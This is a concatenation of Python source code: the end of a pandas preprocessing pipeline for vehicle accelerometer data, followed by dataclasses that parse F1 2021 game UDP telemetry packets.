#2. Segment data
segments = split(data, segment_length)
if not exact_length:
for segment in segments:
segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))
return segments
#3. Remove segments that are too long or too short after splitting
min_length_subsegements = []
for segment in segments:
if segment.shape[0] == segment_length:
min_length_subsegements.append(segment)
if not aggregate:
for segment in min_length_subsegements:
segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))
return min_length_subsegements
#3. Resample and aggregate data
segments_combined = None
for segment in min_length_subsegements:
segment = segment.reset_index()
segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))
segment = self.resample_quantitative_data(segment,
freq="{}s".format(segment_length),
mode = 'mean')
if segments_combined is None:
segments_combined = segment
else:
segments_combined = pandas.concat([segments_combined, segment], axis=0)
if segments_combined is not None:
segments_combined = segments_combined.reset_index()
segments_combined.index = pandas.DatetimeIndex(
segments_combined.index.astype('datetime64[1s]'))
segments_aggregated.append(segments_combined)
return segments_aggregated
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def de_segment_data(self, data_segments, selected_columns=None, axis = 0):
"""
Desegements as time series.
:param data_segments:
:param selected_columns:
:param axis:
:return:
"""
try:
data = None
for ind in range(len(data_segments)):
if data is None:
data = data_segments[ind][selected_columns]
else:
data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis)
data = data.reset_index(drop=True)
return data
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def remove_nans(self, data, replacement_mode, replacement_value=None):
"""
Remove NaNs
:param data:
:param replacement_mode: string, 'mean', 'replacement_val', 'delet_row'
:param replacement_value: any type, used as value if replacment_mode is 'default_val'
:return: pandas.DataFrame
"""
try:
if data is None or replacement_mode is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if replacement_mode == 'mean':
return MeanReplacementStrategy().replace(data, 'NaN')
if replacement_mode == 'del_row':
return DelRowReplacementStrategy().replace(data, 'NaN')
if replacement_mode == 'replacement_val':
return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value)
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None):
"""
Removes outlieres either based on quantile or a threshold value.
:param data:
:param replacement_mode:
:param columns:
:param quantile:
:param threshold:
:return:
"""
try:
if data is None or replacement_mode is None or columns is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if len(columns) < 1:
raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)
if replacement_mode == 'quantile':
# Source for next 7 lines of code after comment:
# https://nextjournal.com/schmudde/how-to-remove-outliers-in-data
for column in columns:
not_outliers = data[column].between(
data[column].quantile(1.0 - quantile),
data[column].quantile(quantile)
)
data[column] = data[column][not_outliers]
index_names = data[~not_outliers].index
data.drop(index_names, inplace=True)
old_index = data.index
data = data.reset_index(drop=False)
data = data.set_index(old_index)
return data
if replacement_mode == 'threshold':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def resample_quantitative_data(self, data, freq, mode = None):
"""
Resamples quantitative data.
:param data:
:param freq:
:param mode:
:return:
"""
# Source:
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html
# https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html
try:
if data is None or freq is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'mean' or mode is None:
return data.resample(freq).mean()
if mode == 'sum':
return data.resample(freq).sum()
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def convert_unix_to_datetime(self, data, column, unit):
"""
Converts unix time stamps to date time.
:param data:
:param column:
:param unit:
:return:
"""
# Source:
# https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe
# https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime
try:
if data is None or column is None or unit is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
data[column] = pandas.to_datetime(data[column], unit=unit)
return data
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode):
"""
Remove rows that have an unwanted label.
:param data:
:param unwanted_labels:
:param replacement_mode:
:return:
"""
try:
if data is None or replacement_mode is None or unwanted_labels is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if replacement_mode == 'del_row':
return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels)
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None):
"""
Project accelerometer data from local vehicle coordinates to a global coordinate system.
:param data:
:param target_columns:
:param mode:
:param args:
:return:
"""
try:
if data is None or target_columns is None or mode is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list):
raise TypeError(type(data))
if mode == 'mean_estimate_gravity':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
if mode == 'gyroscope':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
if mode == 'gravity':
if len(target_columns) != len(args):
raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)
for ind, column in enumerate(target_columns):
data[column] = data[column] - data[args[ind]]
return data
if mode == 'orientation':
if len(target_columns)+1 != len(args):
raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)
# Source for theory behind below calculation
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation
# https://en.wikipedia.org/wiki/Homogeneous_coordinates
# #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it
for ind, column in enumerate(target_columns):
data[column] = data[column] * (data[args[ind]] / data[args[3]])
return data
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def label_data(self, labels, data):
"""
Combines labels vector and data matrix.
:param labels:
:param data:
:return:
"""
try:
if data is None or labels is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if (len(labels) != len(data)):
raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value)
return pandas.concat((labels, data), axis=1)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def znormalize_quantitative_data(self, data, columns = None, mean = None, std = None):
"""
Apply z-normalization to a data set.
:param data:
:param columns:
:param mean:
:param std:
:return:
"""
try:
if data is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if not all(column in data.keys() for column in columns):
raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)
if mean is None and std is None:
if columns is not None:
mean = data[columns].mean()
std = data[columns].std()
data[columns] = (data[columns] - data[columns].mean()) / data[columns].std()
else:
mean = data.mean()
std = data.std()
data = (data - data.mean()) / data.std()
elif mean is not None and std is not None:
if columns is not None:
data[columns] = (data[columns] - mean) / std
else:
data = (data - mean) / std
else:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
return data, mean, std
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def min_max_normalize_quantitative_data(self, data, columns=None):
"""
Apply min-max-normalization to a data set.
:param data:
:param columns:
:return:
"""
try:
if data is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if not all(column in data.keys() for column in columns):
raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)
if columns is not None:
data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5
else:
data = (data - data.min()) / (data.max() - data.min()) # to center around 0.0 substract 0.5
return data
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def re_represent_data(self, current_representation, target_representation, data):
"""
Change representation of a data set.
:param current_representation:
:param target_representation:
:param data:
:return:
"""
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
@overrides
def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None):
"""
Apply a dimensionality reduction technique to a data set.
:param data:
:param mode:
:param reduced_column_name:
:param columns:
:return:
"""
try:
if data is None or mode is None or reduced_column_name is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'euclidean':
# Source:
# https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/
# https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8
# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html
reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative
old_index = data.index
data = pandas.concat([data, reduced], axis=1)
data = data.rename(columns={0: reduced_column_name})
data = data.reset_index(drop=True)
data = data.set_index(old_index)
return data
if mode == 'manhatten':
reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1)
old_index = data.index
data = pandas.concat([data, reduced], axis=1)
data = data.rename(columns={0: reduced_column_name})
data = data.reset_index(drop=True)
data = data.set_index(old_index)
return data
if mode == 'pca':
# Source:
# https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe
# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html
# https://en.wikipedia.org/wiki/Principal_component_analysis
pca = PCA(n_components=1)
pca.fit(data[columns])
reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T))
reduced = reduced.rename(columns={0:reduced_column_name})
reduced = reduced.reset_index(drop=True)
old_index = data.index
data = data.reset_index(drop=True)
data = pandas.concat([data, reduced], axis=1)
data = data.set_index(old_index)
return data
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def encode_categorical_features(self, data, mode, columns, encoding_function):
"""
Encode categorical features using an encoding function.
:param data:
:param mode:
:param columns:
:param encoding_function:
:return:
"""
try:
if data is None or mode is None or columns is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(
columns, list):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'custom_function':
if encoding_function is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
for column in columns:
data[column] = encoding_function(data[column])
return data
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def inference_split_process(self, data, config, meta_data):
"""
Apply all preprocessing steps necessary for inference.
:param data: pandas.DataFrame
:param params: List
:return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame
"""
print('Fetch params')
acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]
freq = config['pre_proc_resample_freq'] # '1000ms'
mean_train = meta_data['mean_train']
std_train = meta_data['std_train']
print('Convert time unit, remove nans')
data = self.convert_unix_to_datetime(data, column='time', unit='ms')
data = self.remove_nans(data, replacement_mode='del_row')
data.set_index(data['time'], drop=True, inplace=True)
print('Resample')
data = self.resample_quantitative_data(data,
freq=freq) # 8000 1.25 Hz
print('Dimensionality reduction')
data = self.reduce_quantitativ_data_dimensionality(
data=data,
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
print('Normalizing, outlier removal')
selected_columns = ['acceleration_abs']
data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train)
data = self.remove_outliers_from_quantitative_data(
data,
replacement_mode='quantile',
columns=selected_columns,
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-1]
return data
@overrides
def training_split_process(self, data, config, labels):
"""
Apply all preprocessing steps necessary for training.
:param data: pandas.DataFrame
:param params: List
:return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame
"""
print('Fetch params')
#print(params)
labels = labels
test_sz = config['pre_proc_test_sz']
train_sz = config['pre_proc_training_sz']
valid_sz = config['pre_proc_validation_sz']
#acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z']
acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]
selected_coarse_labels = config['pre_proc_movement_type_label'] #[5]
selected_road_labels = config['pre_proc_road_type_label'] #[1, 3]
freq = config['pre_proc_resample_freq'] #'1000ms'
print('Convert time unit, label data, remove nans')
data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms')
data = self.label_data(data, labels)
data = self.remove_nans(data, replacement_mode='del_row')
print('Train, Test, Validation split')
data_len = data.shape[0]
test_len = int(data_len * test_sz)
train_len = int(data_len * train_sz)
valid_len = int(data_len * valid_sz)
data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len)
data_test = data_test_valid.head(test_len)
data_valid = data_test_valid.tail(valid_len)
print('Segment by labels')
#Segment Train
car_train_segments = self.segment_data(data_train, mode='labels',
label_column='coarse_label',
args=selected_coarse_labels)
data_train_segments = []
for car_segment in car_train_segments:
road_segments = self.segment_data(car_segment, mode='labels',
label_column='road_label',
args=selected_road_labels
)
for road_segment in road_segments:
data_train_segments.append(road_segment)
#Segment Test
car_test_segments = self.segment_data(data_test, mode='labels',
label_column='coarse_label',
args=selected_coarse_labels)
data_test_segments = []
for car_segment in car_test_segments:
road_segments = self.segment_data(car_segment, mode='labels',
label_column='road_label',
args=selected_road_labels
)
for road_segment in road_segments:
data_test_segments.append(road_segment)
#Segment Valid
car_valid_segments = self.segment_data(data_valid, mode='labels',
label_column='coarse_label',
args=selected_coarse_labels)
data_valid_segments = []
for car_segment in car_valid_segments:
road_segments = self.segment_data(car_segment, mode='labels',
label_column='road_label',
args=selected_road_labels
)
for road_segment in road_segments:
data_valid_segments.append(road_segment)
print('Resample')
#Train
for ind in range(len(data_train_segments)):
data_train_segments[ind] = data_train_segments[ind].set_index('time')
data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind],
freq=freq) # 8000 1.25 Hz
#Test
for ind in range(len(data_test_segments)):
data_test_segments[ind] = data_test_segments[ind].set_index('time')
data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind],
freq=freq)
#Valid
for ind in range(len(data_valid_segments)):
data_valid_segments[ind] = data_valid_segments[ind].set_index('time')
data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind],
freq=freq)
print('Dimensionality reduction')
#Train
for ind in range(len(data_train_segments)):
data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality(
data=data_train_segments[ind],
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
#Test
for ind in range(len(data_test_segments)):
data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality(
data=data_test_segments[ind],
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
#Valid
for ind in range(len(data_valid_segments)):
data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality(
data=data_valid_segments[ind],
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
print('Normalizing, outlier removal')
#Train
selected_columns = ['acceleration_abs',
'road_label', 'id'] # 'acceleration_abs'
data_train = self.de_segment_data(data_train_segments, selected_columns)
data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2])
data_train = self.remove_outliers_from_quantitative_data(
data_train,
replacement_mode='quantile',
columns=selected_columns[:-2],
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-2]
#Test
data_test = self.de_segment_data(data_test_segments, selected_columns)
data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test,
selected_columns[:-2],
mean_train, std_train)
data_test = self.remove_outliers_from_quantitative_data(
data_test,
replacement_mode='quantile',
columns=selected_columns[:-2],
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-2]
#Valid
data_valid = self.de_segment_data(data_valid_segments, selected_columns)
data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid,
selected_columns[:-2],
mean_train, std_train)
data_valid = self.remove_outliers_from_quantitative_data(
data_valid,
replacement_mode='quantile',
columns=selected_columns[:-2],
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-2]
data_train = data_train.loc[:, ~data_train.columns.duplicated()]
data_test = data_test.loc[:, ~data_test.columns.duplicated()]
data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()]
#print('Rolling mean smoothing')
#data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable
#data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)
#data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)
#data_train = self.remove_nans(data_train, replacement_mode='del_row')
#data_test = self.remove_nans(data_test, replacement_mode='del_row')
#data_valid = self.remove_nans(data_valid, replacement_mode='del_row')
#print(data_train.head(100))
return data_train, mean_train, std_train, data_test, data_valid | 2.6875 | 3 |
f1_telemetry/data/structs.py | pahansen/f1-2021-telemetry-dashboard | 1 | 12797534 | """Struct classes for car telemetry. Classes parse data from binary format and extract player data."""
import struct
import ctypes
from dataclasses import dataclass, asdict
from typing import List
PACKET_HEADER_FORMAT = "<HBBBBQfLBB"
PACKET_CAR_TELEMETRY_DATA_FORMAT = "BBb"
CAR_TELEMETRY_DATA_FORMAT = "HfffBbHBBHHHHHBBBBBBBBHffffBBBB"
LAP_DATA_FORMAT = "LLHHfffBBBBBBBBBBBBBBHHB"
CAR_STATUS_DATA_FORMAT = "BBBBBfffHHBBHBBBbfBfffB"
CAR_DAMAGE_DATA_FORMAT = "ffffBBBBBBBBBBBBBBBBBBBBBBB"
def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict:
"""Get single attributes from attributes list and allocate to position on car (fl, fr, rl, rr).
Args:
telemetry_values(list): List of telemetry values that should be mapped to attributes.
attribute_name(str): Attribute name used as keys in dict.
"""
car_position_mapping = ["rl", "rr", "fl", "fr"]
telemetry_values_dict = {}
for i, telemetry_value in enumerate(telemetry_values):
key_name = str(attribute_name) + "_" + car_position_mapping[i]
telemetry_values_dict[key_name] = telemetry_value
return telemetry_values_dict
@dataclass
class PacketHeader:
"""PacketHeader struct."""
m_packet_format: ctypes.c_uint16
m_game_major_version: ctypes.c_uint8
m_game_minor_version: ctypes.c_uint8
m_packet_version: ctypes.c_uint8
m_packet_id: ctypes.c_uint8
m_session_uid: ctypes.c_uint64
m_session_time: ctypes.c_float
m_frame_identifier: ctypes.c_uint32
m_player_car_index: ctypes.c_uint8
m_secondary_player_car_index: ctypes.c_uint8
@classmethod
def from_binary(cls, binary_message: str):
"""Create class form binary UDP package.
Args:
binary_message (str): Binary representation of package header.
"""
format_string = "<HBBBBQfLBB"
unpacked = struct.unpack_from(format_string, binary_message)
return cls(
unpacked[0],
unpacked[1],
unpacked[2],
unpacked[3],
unpacked[4],
unpacked[5],
unpacked[6],
unpacked[7],
unpacked[8],
unpacked[9],
)
@dataclass
class PacketWOAdditionalAttributes:
"""PacketCarStatusData struct."""
m_header: PacketHeader
@classmethod
def get_message_list(
cls,
packet_header: PacketHeader,
binary_message: str,
message_format: str,
message_type: object,
):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
# Unpack struct
unpacked = struct.unpack_from(
PACKET_HEADER_FORMAT + "".join(message_format * 22),
binary_message,
)
# Remove header from struct
unpacked_wo_header = unpacked[len(asdict(packet_header)) : :]
# Get lap data for each active car
data_list = list()
for i in range(22):
data = message_type.from_unpacked(
unpacked_wo_header[
i * len(message_format) : (i + 1) * len(message_format)
]
)
data_list.append(data)
return data_list
@dataclass
class CarTelemetryData:
"""CarTelemetryData struct."""
m_speed: ctypes.c_uint16
m_throttle: ctypes.c_float
m_steer: ctypes.c_float
m_brake: ctypes.c_float
m_clutch: ctypes.c_uint8
m_gear: ctypes.c_int8
m_engine_rpm: ctypes.c_uint16
m_drs: ctypes.c_uint8
m_rev_lights_percent: ctypes.c_uint8
m_rev_lights_bit_value: ctypes.c_uint16
m_brakes_temperature: List[ctypes.c_uint16]
m_tyres_surface_temperature: List[ctypes.c_uint8]
m_tyres_inner_temperature: List[ctypes.c_uint8]
m_engine_temperature: ctypes.c_uint16
m_tyres_pressure: List[ctypes.c_float]
m_surface_type: List[ctypes.c_uint8]
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
attributes to construct CarTelemetryData class.
"""
return cls(
unpacked[0],
unpacked[1],
unpacked[2],
unpacked[3],
unpacked[4],
unpacked[5],
unpacked[6],
unpacked[7],
unpacked[8],
unpacked[9],
list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]),
list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]),
list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]),
unpacked[22],
list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]),
list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]),
)
@dataclass
class PacketCarTelemetryData:
"""PacketCarTelemetryData struct."""
m_header: PacketHeader
m_car_telemetry_data: List[CarTelemetryData]
m_mfd_panel_index: ctypes.c_uint8
m_mfd_panel_index_secondary_player: ctypes.c_uint8
m_suggested_gear: ctypes.c_int8
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
# Unpack struct
unpacked = struct.unpack_from(
PACKET_HEADER_FORMAT
+ "".join(CAR_TELEMETRY_DATA_FORMAT * 22)
+ PACKET_CAR_TELEMETRY_DATA_FORMAT,
binary_message,
)
# Remove header from struct
unpacked_wo_header = unpacked[len(asdict(packet_header)) : :]
# Get telemetry for each active car
car_telemetry_data_list = list()
for i in range(22):
car_telemetry_data = CarTelemetryData.from_unpacked(
unpacked_wo_header[
i
* len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1)
* len(CAR_TELEMETRY_DATA_FORMAT)
]
)
car_telemetry_data_list.append(car_telemetry_data)
return cls(
packet_header,
car_telemetry_data_list,
unpacked_wo_header[-3],
unpacked_wo_header[-2],
unpacked_wo_header[-1],
)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
player_car_index = self.m_header.m_player_car_index
player_car_telemetry = self.m_car_telemetry_data[player_car_index]
player_telemetry_message = (
self.m_header.__dict__ | player_car_telemetry.__dict__.copy()
)
# Map tyre temperature values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_tyres_surface_temperature"],
"m_tyres_surface_temperature",
)
)
player_telemetry_message.pop("m_tyres_surface_temperature")
# Map tyre inner temperature values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_tyres_inner_temperature"],
"m_tyres_inner_temperature",
)
)
player_telemetry_message.pop("m_tyres_inner_temperature")
# Map brake temperature values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_brakes_temperature"],
"m_brakes_temperature",
)
)
player_telemetry_message.pop("m_brakes_temperature")
# Map tyres pressure values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_tyres_pressure"],
"m_tyres_pressure",
)
)
player_telemetry_message.pop("m_tyres_pressure")
player_telemetry_message.pop("m_surface_type")
return player_telemetry_message
@dataclass
class LapData:
"""LapData struct."""
m_lastLapTimeInMS: ctypes.c_uint32
m_currentLapTimeInMS: ctypes.c_uint32
m_sector1TimeInMS: ctypes.c_uint16
m_sector2TimeInMS: ctypes.c_uint16
m_lapDistance: ctypes.c_uint32
m_currentLapNum: ctypes.c_uint8
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
attributes to construct CarTelemetryData class.
"""
return cls(
unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8]
)
@dataclass
class PacketLapData(PacketWOAdditionalAttributes):
"""PacketCarTelemetryData struct."""
m_lap_data: List[LapData]
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
lap_data_list = cls.get_message_list(
packet_header, binary_message, LAP_DATA_FORMAT, LapData
)
return cls(packet_header, lap_data_list)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
player_car_index = self.m_header.m_player_car_index
player_values = (
self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy()
)
return player_values
@dataclass
class CarStatusData:
"""CarStatusData struct."""
m_fuelInTank: ctypes.c_float
m_fuelCapacity: ctypes.c_float
m_fuelRemainingLaps: ctypes.c_float
m_actualTyreCompound: ctypes.c_uint8
m_tyresAgeLaps: ctypes.c_uint8
m_ersStoreEnergy: ctypes.c_float
m_ersDeployMode: ctypes.c_uint8
m_ersHarvestedThisLapMGUK: ctypes.c_float
m_ersHarvestedThisLapMGUH: ctypes.c_float
m_ersDeployedThisLap: ctypes.c_float
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
attributes to construct CarTelemetryData class.
"""
return cls(
unpacked[5],
unpacked[6],
unpacked[7],
unpacked[13],
unpacked[15],
unpacked[17],
unpacked[18],
unpacked[19],
unpacked[20],
unpacked[21],
)
@dataclass
class PacketCarStatusData(PacketWOAdditionalAttributes):
"""PacketCarStatusData struct."""
m_carStatusData: List[CarStatusData]
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
car_status_data_list = cls.get_message_list(
packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData
)
return cls(packet_header, car_status_data_list)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
